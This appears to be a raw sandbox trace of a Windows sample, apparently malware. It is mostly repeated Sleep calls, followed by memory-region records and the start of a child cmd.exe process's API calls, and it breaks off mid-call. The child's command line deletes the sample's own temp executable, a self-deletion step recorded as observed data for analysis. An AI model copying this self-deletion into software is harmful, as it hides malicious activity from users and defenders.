[0295.378] Sleep (dwMilliseconds=0x7d0) [0295.414] Sleep (dwMilliseconds=0x7d0) [0295.418] Sleep (dwMilliseconds=0x7d0) [0295.419] Sleep (dwMilliseconds=0x7d0) [0295.455] Sleep (dwMilliseconds=0x7d0) [0295.490] Sleep (dwMilliseconds=0x7d0) [0295.527] Sleep (dwMilliseconds=0x7d0) [0295.562] Sleep (dwMilliseconds=0x7d0) [0295.568] Sleep (dwMilliseconds=0x7d0) [0295.601] Sleep (dwMilliseconds=0x7d0) [0295.636] Sleep (dwMilliseconds=0x7d0) [0295.673] Sleep (dwMilliseconds=0x7d0) [0295.692] Sleep (dwMilliseconds=0x7d0) [0295.693] Sleep (dwMilliseconds=0x7d0) [0295.709] Sleep (dwMilliseconds=0x7d0) [0295.744] Sleep (dwMilliseconds=0x7d0) [0295.780] Sleep (dwMilliseconds=0x7d0) [0295.821] Sleep (dwMilliseconds=0x7d0) [0295.823] Sleep (dwMilliseconds=0x7d0) [0295.836] Sleep (dwMilliseconds=0x7d0) [0295.871] Sleep (dwMilliseconds=0x7d0) [0295.906] Sleep (dwMilliseconds=0x7d0) [0295.931] Sleep (dwMilliseconds=0x7d0) [0295.943] Sleep (dwMilliseconds=0x7d0) [0295.977] Sleep (dwMilliseconds=0x7d0) [0296.013] Sleep (dwMilliseconds=0x7d0) [0296.043] Sleep (dwMilliseconds=0x7d0) [0296.045] Sleep (dwMilliseconds=0x7d0) [0296.058] Sleep (dwMilliseconds=0x7d0) [0296.094] Sleep (dwMilliseconds=0x7d0) [0296.130] Sleep (dwMilliseconds=0x7d0) [0296.165] Sleep (dwMilliseconds=0x7d0) [0296.169] Sleep (dwMilliseconds=0x7d0) [0296.170] Sleep (dwMilliseconds=0x7d0) [0296.201] Sleep (dwMilliseconds=0x7d0) [0296.237] Sleep (dwMilliseconds=0x7d0) [0296.271] Sleep (dwMilliseconds=0x7d0) [0296.278] Sleep (dwMilliseconds=0x7d0) [0296.279] Sleep (dwMilliseconds=0x7d0) [0296.308] Sleep (dwMilliseconds=0x7d0) [0296.342] Sleep (dwMilliseconds=0x7d0) [0296.378] Sleep (dwMilliseconds=0x7d0) [0296.389] Sleep (dwMilliseconds=0x7d0) [0296.391] Sleep (dwMilliseconds=0x7d0) [0296.414] Sleep (dwMilliseconds=0x7d0) [0296.450] Sleep (dwMilliseconds=0x7d0) [0296.488] Sleep (dwMilliseconds=0x7d0) [0296.502] Sleep (dwMilliseconds=0x7d0) [0296.503] Sleep (dwMilliseconds=0x7d0) [0296.525] Sleep (dwMilliseconds=0x7d0) [0296.559] Sleep (dwMilliseconds=0x7d0) [0296.594] Sleep (dwMilliseconds=0x7d0) [0296.607] Sleep (dwMilliseconds=0x7d0) [0296.608] Sleep (dwMilliseconds=0x7d0) [0296.630] Sleep (dwMilliseconds=0x7d0) [0296.666] Sleep (dwMilliseconds=0x7d0) [0296.700] Sleep (dwMilliseconds=0x7d0) [0296.712] Sleep (dwMilliseconds=0x7d0) [0296.714] Sleep (dwMilliseconds=0x7d0) [0296.736] Sleep (dwMilliseconds=0x7d0) [0296.770] Sleep (dwMilliseconds=0x7d0) [0296.824] Sleep (dwMilliseconds=0x7d0) [0296.837] Sleep (dwMilliseconds=0x7d0) [0296.861] Sleep (dwMilliseconds=0x7d0) [0296.895] Sleep (dwMilliseconds=0x7d0) [0296.930] Sleep (dwMilliseconds=0x7d0) [0296.940] Sleep (dwMilliseconds=0x7d0) [0296.942] Sleep (dwMilliseconds=0x7d0) [0296.965] Sleep (dwMilliseconds=0x7d0) [0297.000] Sleep (dwMilliseconds=0x7d0) [0297.034] Sleep (dwMilliseconds=0x7d0) [0297.051] Sleep (dwMilliseconds=0x7d0) [0297.070] Sleep (dwMilliseconds=0x7d0) [0297.105] Sleep (dwMilliseconds=0x7d0) [0297.140] Sleep (dwMilliseconds=0x7d0) [0297.156] Sleep (dwMilliseconds=0x7d0) [0297.157] Sleep (dwMilliseconds=0x7d0) [0297.175] Sleep (dwMilliseconds=0x7d0) [0297.209] Sleep (dwMilliseconds=0x7d0) [0297.244] Sleep (dwMilliseconds=0x7d0) [0297.259] Sleep (dwMilliseconds=0x7d0) [0297.280] Sleep (dwMilliseconds=0x7d0) [0297.315] Sleep (dwMilliseconds=0x7d0) [0297.349] Sleep (dwMilliseconds=0x7d0) [0297.364] Sleep (dwMilliseconds=0x7d0) [0297.385] Sleep (dwMilliseconds=0x7d0) [0297.419] Sleep (dwMilliseconds=0x7d0) [0297.454] Sleep (dwMilliseconds=0x7d0) [0297.469] Sleep (dwMilliseconds=0x7d0) [0297.471] Sleep (dwMilliseconds=0x7d0) [0297.492] Sleep (dwMilliseconds=0x7d0) [0297.526] Sleep (dwMilliseconds=0x7d0) [0297.561] Sleep (dwMilliseconds=0x7d0) [0297.573] Sleep (dwMilliseconds=0x7d0) [0297.597] Sleep (dwMilliseconds=0x7d0) [0297.632] Sleep (dwMilliseconds=0x7d0) [0297.666] Sleep (dwMilliseconds=0x7d0) [0297.677] Sleep (dwMilliseconds=0x7d0) [0297.679] Sleep (dwMilliseconds=0x7d0) [0297.702] Sleep (dwMilliseconds=0x7d0) [0297.736] Sleep (dwMilliseconds=0x7d0) [0297.825] Sleep (dwMilliseconds=0x7d0) [0297.836] Sleep (dwMilliseconds=0x7d0) [0297.861] Sleep (dwMilliseconds=0x7d0) [0297.895] Sleep (dwMilliseconds=0x7d0) [0297.929] Sleep (dwMilliseconds=0x7d0) [0297.937] Sleep (dwMilliseconds=0x7d0) [0297.939] Sleep (dwMilliseconds=0x7d0) [0297.965] Sleep (dwMilliseconds=0x7d0) [0298.000] Sleep (dwMilliseconds=0x7d0) [0298.034] Sleep (dwMilliseconds=0x7d0) [0298.041] Sleep (dwMilliseconds=0x7d0) [0298.043] Sleep (dwMilliseconds=0x7d0) [0298.077] Sleep (dwMilliseconds=0x7d0) [0298.112] Sleep (dwMilliseconds=0x7d0) [0298.147] Sleep (dwMilliseconds=0x7d0) [0298.153] Sleep (dwMilliseconds=0x7d0) [0298.154] Sleep (dwMilliseconds=0x7d0) [0298.183] Sleep (dwMilliseconds=0x7d0) [0298.218] Sleep (dwMilliseconds=0x7d0) [0298.252] Sleep (dwMilliseconds=0x7d0) [0298.257] Sleep (dwMilliseconds=0x7d0) [0298.258] Sleep (dwMilliseconds=0x7d0) [0298.288] Sleep (dwMilliseconds=0x7d0) [0298.322] Sleep (dwMilliseconds=0x7d0) [0298.357] Sleep (dwMilliseconds=0x7d0) [0298.361] Sleep (dwMilliseconds=0x7d0) [0298.362] Sleep (dwMilliseconds=0x7d0) [0298.393] Sleep (dwMilliseconds=0x7d0) [0298.428] Sleep (dwMilliseconds=0x7d0) [0298.463] Sleep (dwMilliseconds=0x7d0) [0298.468] Sleep (dwMilliseconds=0x7d0) [0298.500] Sleep (dwMilliseconds=0x7d0) [0298.534] Sleep (dwMilliseconds=0x7d0) [0298.569] Sleep (dwMilliseconds=0x7d0) [0298.571] Sleep (dwMilliseconds=0x7d0) [0298.573] Sleep (dwMilliseconds=0x7d0) [0298.605] Sleep (dwMilliseconds=0x7d0) [0298.640] Sleep (dwMilliseconds=0x7d0) [0298.674] Sleep (dwMilliseconds=0x7d0) [0298.676] Sleep (dwMilliseconds=0x7d0) [0298.710] Sleep (dwMilliseconds=0x7d0) [0298.744] Sleep (dwMilliseconds=0x7d0) [0298.778] Sleep (dwMilliseconds=0x7d0) [0298.780] Sleep (dwMilliseconds=0x7d0) [0298.837] Sleep (dwMilliseconds=0x7d0) [0298.872] Sleep (dwMilliseconds=0x7d0) [0298.903] Sleep (dwMilliseconds=0x7d0) [0298.905] Sleep (dwMilliseconds=0x7d0) [0298.908] Sleep (dwMilliseconds=0x7d0) [0298.942] Sleep (dwMilliseconds=0x7d0) [0299.010] Sleep (dwMilliseconds=0x7d0) [0299.040] Sleep (dwMilliseconds=0x7d0) [0299.052] Sleep (dwMilliseconds=0x7d0) [0299.087] Sleep (dwMilliseconds=0x7d0) [0299.122] Sleep (dwMilliseconds=0x7d0) [0299.151] Sleep (dwMilliseconds=0x7d0) [0299.152] Sleep (dwMilliseconds=0x7d0) [0299.158] Sleep (dwMilliseconds=0x7d0) [0299.192] Sleep (dwMilliseconds=0x7d0) [0299.226] Sleep (dwMilliseconds=0x7d0) [0299.254] Sleep (dwMilliseconds=0x7d0) [0299.255] Sleep (dwMilliseconds=0x7d0) [0299.263] Sleep (dwMilliseconds=0x7d0) [0299.297] Sleep (dwMilliseconds=0x7d0) [0299.332] Sleep (dwMilliseconds=0x7d0) [0299.358] Sleep (dwMilliseconds=0x7d0) [0299.359] Sleep (dwMilliseconds=0x7d0) [0299.368] Sleep (dwMilliseconds=0x7d0) [0299.402] Sleep (dwMilliseconds=0x7d0) [0299.436] Sleep (dwMilliseconds=0x7d0) [0299.462] Sleep (dwMilliseconds=0x7d0) [0299.463] Sleep (dwMilliseconds=0x7d0) [0299.472] Sleep (dwMilliseconds=0x7d0) [0299.508] Sleep (dwMilliseconds=0x7d0) [0299.543] Sleep (dwMilliseconds=0x7d0) [0299.569] Sleep (dwMilliseconds=0x7d0) [0299.571] Sleep (dwMilliseconds=0x7d0) [0299.580] Sleep (dwMilliseconds=0x7d0) [0299.615] Sleep (dwMilliseconds=0x7d0) [0299.650] Sleep (dwMilliseconds=0x7d0) [0299.686] Sleep (dwMilliseconds=0x7d0) [0299.711] Sleep (dwMilliseconds=0x7d0) [0299.712] Sleep (dwMilliseconds=0x7d0) [0299.723] Sleep (dwMilliseconds=0x7d0) [0299.759] Sleep (dwMilliseconds=0x7d0) [0299.826] Sleep (dwMilliseconds=0x7d0) [0299.862] Sleep (dwMilliseconds=0x7d0) [0299.874] Sleep (dwMilliseconds=0x7d0) [0299.898] Sleep (dwMilliseconds=0x7d0) [0299.934] Sleep (dwMilliseconds=0x7d0) [0299.968] Sleep (dwMilliseconds=0x7d0) [0299.983] Sleep (dwMilliseconds=0x7d0) [0299.985] Sleep (dwMilliseconds=0x7d0) [0300.005] Sleep (dwMilliseconds=0x7d0) [0300.040] Sleep (dwMilliseconds=0x7d0) [0300.083] Sleep (dwMilliseconds=0x7d0) [0300.106] Sleep (dwMilliseconds=0x7d0) [0300.109] Sleep (dwMilliseconds=0x7d0) [0300.120] Sleep (dwMilliseconds=0x7d0) [0300.155] Sleep (dwMilliseconds=0x7d0) [0300.190] Sleep (dwMilliseconds=0x7d0) [0300.226] Sleep (dwMilliseconds=0x7d0) [0300.228] Sleep (dwMilliseconds=0x7d0) [0300.263] Sleep (dwMilliseconds=0x7d0) [0300.298] Sleep (dwMilliseconds=0x7d0) [0300.333] Sleep (dwMilliseconds=0x7d0) [0300.339] Sleep (dwMilliseconds=0x7d0) [0300.371] Sleep (dwMilliseconds=0x7d0) [0300.405] Sleep (dwMilliseconds=0x7d0) [0300.441] Sleep (dwMilliseconds=0x7d0) [0300.462] Sleep (dwMilliseconds=0x7d0) [0300.464] Sleep (dwMilliseconds=0x7d0) [0300.479] Sleep (dwMilliseconds=0x7d0) [0300.516] Sleep (dwMilliseconds=0x7d0) [0300.553] Sleep (dwMilliseconds=0x7d0) [0300.589] Sleep (dwMilliseconds=0x7d0) [0300.617] Sleep (dwMilliseconds=0x7d0) [0300.618] Sleep (dwMilliseconds=0x7d0) [0300.628] Sleep (dwMilliseconds=0x7d0) [0300.663] Sleep (dwMilliseconds=0x7d0) [0300.698] Sleep (dwMilliseconds=0x7d0) [0300.733] Sleep (dwMilliseconds=0x7d0) [0300.737] Sleep (dwMilliseconds=0x7d0) [0300.770] Sleep (dwMilliseconds=0x7d0) [0300.832] Sleep (dwMilliseconds=0x7d0) [0300.868] Sleep (dwMilliseconds=0x7d0) [0300.892] Sleep (dwMilliseconds=0x7d0) [0300.893] Sleep (dwMilliseconds=0x7d0) [0300.905] Sleep (dwMilliseconds=0x7d0) [0300.941] Sleep (dwMilliseconds=0x7d0) [0300.976] Sleep (dwMilliseconds=0x7d0) [0301.014] Sleep (dwMilliseconds=0x7d0) [0301.032] Sleep (dwMilliseconds=0x7d0) [0301.060] Sleep (dwMilliseconds=0x7d0) [0301.095] Sleep (dwMilliseconds=0x7d0) [0301.133] Sleep (dwMilliseconds=0x7d0) [0301.168] Sleep (dwMilliseconds=0x7d0) [0301.180] Sleep (dwMilliseconds=0x7d0) [0301.207] Sleep (dwMilliseconds=0x7d0) [0301.242] Sleep (dwMilliseconds=0x7d0) [0301.279] Sleep (dwMilliseconds=0x7d0) [0301.314] Sleep (dwMilliseconds=0x7d0) [0301.333] Sleep (dwMilliseconds=0x7d0) [0301.352] Sleep (dwMilliseconds=0x7d0) [0301.423] Sleep (dwMilliseconds=0x7d0) [0301.520] Sleep (dwMilliseconds=0x7d0) [0301.558] Sleep (dwMilliseconds=0x7d0) [0301.564] Sleep (dwMilliseconds=0x7d0) [0301.566] Sleep (dwMilliseconds=0x7d0) [0301.596] Sleep (dwMilliseconds=0x7d0) [0301.632] Sleep (dwMilliseconds=0x7d0) [0301.666] Sleep (dwMilliseconds=0x7d0) [0301.685] Sleep (dwMilliseconds=0x7d0) [0301.702] Sleep (dwMilliseconds=0x7d0) [0301.736] Sleep (dwMilliseconds=0x7d0) [0301.772] Sleep (dwMilliseconds=0x7d0) [0301.827] Sleep (dwMilliseconds=0x7d0) [0301.828] Sleep (dwMilliseconds=0x7d0) [0301.836] Sleep (dwMilliseconds=0x7d0) [0301.871] Sleep (dwMilliseconds=0x7d0) [0301.906] Sleep (dwMilliseconds=0x7d0) [0301.943] Sleep (dwMilliseconds=0x7d0) [0301.950] Sleep (dwMilliseconds=0x7d0) [0301.951] Sleep (dwMilliseconds=0x7d0) [0301.981] Sleep (dwMilliseconds=0x7d0) [0302.017] Sleep (dwMilliseconds=0x7d0) [0302.063] Sleep (dwMilliseconds=0x7d0) [0302.100] Sleep (dwMilliseconds=0x7d0) [0302.112] Sleep (dwMilliseconds=0x7d0) [0302.136] Sleep (dwMilliseconds=0x7d0) [0302.173] Sleep (dwMilliseconds=0x7d0) [0302.209] Sleep (dwMilliseconds=0x7d0) [0302.246] Sleep (dwMilliseconds=0x7d0) [0302.253] Sleep (dwMilliseconds=0x7d0) [0302.254] Sleep (dwMilliseconds=0x7d0) [0302.282] Sleep (dwMilliseconds=0x7d0) [0302.318] Sleep (dwMilliseconds=0x7d0) [0302.352] Sleep (dwMilliseconds=0x7d0) [0302.364] Sleep (dwMilliseconds=0x7d0) [0302.389] Sleep (dwMilliseconds=0x7d0) [0302.427] Sleep (dwMilliseconds=0x7d0) [0302.469] Sleep (dwMilliseconds=0x7d0) [0302.497] Sleep (dwMilliseconds=0x7d0) [0302.520] Sleep (dwMilliseconds=0x7d0) [0302.557] Sleep (dwMilliseconds=0x7d0) [0302.630] Sleep (dwMilliseconds=0x7d0) [0302.667] Sleep (dwMilliseconds=0x7d0) [0302.685] Sleep (dwMilliseconds=0x7d0) [0302.714] Sleep (dwMilliseconds=0x7d0) [0302.750] Sleep (dwMilliseconds=0x7d0) [0302.808] Sleep (dwMilliseconds=0x7d0) [0302.843] Sleep (dwMilliseconds=0x7d0) [0302.850] Sleep (dwMilliseconds=0x7d0) [0302.852] Sleep (dwMilliseconds=0x7d0) [0302.880] Sleep (dwMilliseconds=0x7d0) [0302.915] Sleep (dwMilliseconds=0x7d0) [0302.950] Sleep (dwMilliseconds=0x7d0) [0302.962] Sleep (dwMilliseconds=0x7d0) [0302.987] Sleep (dwMilliseconds=0x7d0) [0303.022] Sleep (dwMilliseconds=0x7d0) [0303.072] Sleep (dwMilliseconds=0x7d0) [0303.108] Sleep (dwMilliseconds=0x7d0) [0303.114] Sleep (dwMilliseconds=0x7d0) [0303.115] Sleep (dwMilliseconds=0x7d0) [0303.147] Sleep (dwMilliseconds=0x7d0) [0303.184] Sleep (dwMilliseconds=0x7d0) [0303.221] Sleep (dwMilliseconds=0x7d0) [0303.257] Sleep (dwMilliseconds=0x7d0) [0303.265] Sleep (dwMilliseconds=0x7d0) [0303.295] Sleep (dwMilliseconds=0x7d0) [0303.331] Sleep (dwMilliseconds=0x7d0) [0303.368] Sleep (dwMilliseconds=0x7d0) [0303.404] Sleep (dwMilliseconds=0x7d0) [0303.412] Sleep (dwMilliseconds=0x7d0) [0303.414] Sleep (dwMilliseconds=0x7d0) [0303.443] Sleep (dwMilliseconds=0x7d0) [0303.479] Sleep (dwMilliseconds=0x7d0) [0303.516] Sleep (dwMilliseconds=0x7d0) [0303.552] Sleep (dwMilliseconds=0x7d0) [0303.565] Sleep (dwMilliseconds=0x7d0) [0303.591] Sleep (dwMilliseconds=0x7d0) [0303.627] Sleep (dwMilliseconds=0x7d0) [0303.664] Sleep (dwMilliseconds=0x7d0) [0303.700] Sleep (dwMilliseconds=0x7d0) [0303.710] Sleep (dwMilliseconds=0x7d0) [0303.741] Sleep (dwMilliseconds=0x7d0) [0303.830] Sleep (dwMilliseconds=0x7d0) [0303.866] Sleep (dwMilliseconds=0x7d0) [0303.879] Sleep (dwMilliseconds=0x7d0) [0303.880] Sleep (dwMilliseconds=0x7d0) [0303.903] Sleep (dwMilliseconds=0x7d0) [0303.939] Sleep (dwMilliseconds=0x7d0) [0303.975] Sleep (dwMilliseconds=0x7d0) [0304.011] Sleep (dwMilliseconds=0x7d0) [0304.016] Sleep (dwMilliseconds=0x7d0) [0304.018] Sleep (dwMilliseconds=0x7d0) [0304.055] Sleep (dwMilliseconds=0x7d0) [0304.090] Sleep (dwMilliseconds=0x7d0) [0304.125] Sleep (dwMilliseconds=0x7d0) [0304.138] Sleep (dwMilliseconds=0x7d0) [0304.139] Sleep (dwMilliseconds=0x7d0) [0304.163] Sleep (dwMilliseconds=0x7d0) [0304.199] Sleep (dwMilliseconds=0x7d0) [0304.236] Sleep (dwMilliseconds=0x7d0) [0304.271] Sleep (dwMilliseconds=0x7d0) [0304.291] Sleep (dwMilliseconds=0x7d0) [0304.309] Sleep (dwMilliseconds=0x7d0) [0304.345] Sleep (dwMilliseconds=0x7d0) [0304.381] Sleep (dwMilliseconds=0x7d0) [0304.432] Sleep (dwMilliseconds=0x7d0) [0304.468] Sleep (dwMilliseconds=0x7d0) [0304.471] Sleep (dwMilliseconds=0x7d0) [0304.506] Sleep (dwMilliseconds=0x7d0) [0304.542] Sleep (dwMilliseconds=0x7d0) [0304.578] Sleep (dwMilliseconds=0x7d0) [0304.605] Sleep (dwMilliseconds=0x7d0) [0304.607] Sleep (dwMilliseconds=0x7d0) [0304.616] Sleep (dwMilliseconds=0x7d0) [0304.650] Sleep (dwMilliseconds=0x7d0) [0304.685] Sleep (dwMilliseconds=0x7d0) [0304.710] Sleep (dwMilliseconds=0x7d0) [0304.712] Sleep (dwMilliseconds=0x7d0) [0304.721] Sleep (dwMilliseconds=0x7d0) [0304.756] Sleep (dwMilliseconds=0x7d0) [0304.790] Sleep (dwMilliseconds=0x7d0) [0304.838] Sleep (dwMilliseconds=0x7d0) [0304.849] Sleep (dwMilliseconds=0x7d0) [0304.884] Sleep (dwMilliseconds=0x7d0) [0304.918] Sleep (dwMilliseconds=0x7d0) [0304.945] Sleep (dwMilliseconds=0x7d0) [0304.946] Sleep (dwMilliseconds=0x7d0) [0304.956] Sleep (dwMilliseconds=0x7d0) [0304.989] Sleep (dwMilliseconds=0x7d0) Thread: id = 155 os_tid = 0x8e0 Thread: id = 156 os_tid = 0xf44 Thread: id = 157 os_tid = 0x104c Thread: id = 165 os_tid = 0x1060 Thread: id = 166 os_tid = 0x1064 Thread: id = 173 os_tid = 0x22c Thread: id = 174 os_tid = 0x1164 Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7252c000" os_pid = "0xcb0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x700" cmd_line = "/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1041 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1042 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1043 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1044 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1045 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1046 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1047 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1048 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1049 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1050 start_va = 0xe70000 end_va = 0xec1fff monitored = 1 entry_point = 0xe84fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1051 start_va = 0xed0000 end_va = 0x4ecffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 1052 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1053 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1054 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1055 start_va = 0x7fff0000 end_va = 0x7df884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1056 start_va = 0x7df884cc0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df884cc0000" filename = "" Region: id = 1057 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1058 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1059 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1060 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1061 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1062 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1063 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1064 start_va = 0x530000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1065 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1066 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1067 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1068 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1133 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1134 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1135 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1136 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1137 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1138 start_va = 0x630000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1139 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1140 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 60 os_tid = 0xc60 [0113.995] GetModuleHandleA (lpModuleName=0x0) returned 0xe70000 [0113.995] __set_app_type (_Type=0x1) [0113.995] __p__fmode () returned 0x76624d6c [0113.995] __p__commode () returned 0x76625b1c [0113.995] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85200) returned 0x0 [0113.996] __getmainargs (in: _Argc=0xe960e8, _Argv=0xe960ec, _Env=0xe960f0, _DoWildCard=0, _StartInfo=0xe960fc | out: _Argc=0xe960e8, _Argv=0xe960ec, _Env=0xe960f0) returned 0 [0114.008] GetCurrentThreadId () returned 0xc60 [0114.008] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc60) returned 0x84 [0114.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76410000 [0114.008] GetProcAddress (hModule=0x76410000, lpProcName="SetThreadUILanguage") returned 0x76452510 [0114.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.014] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0114.014] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.014] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.014] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.014] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.014] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, 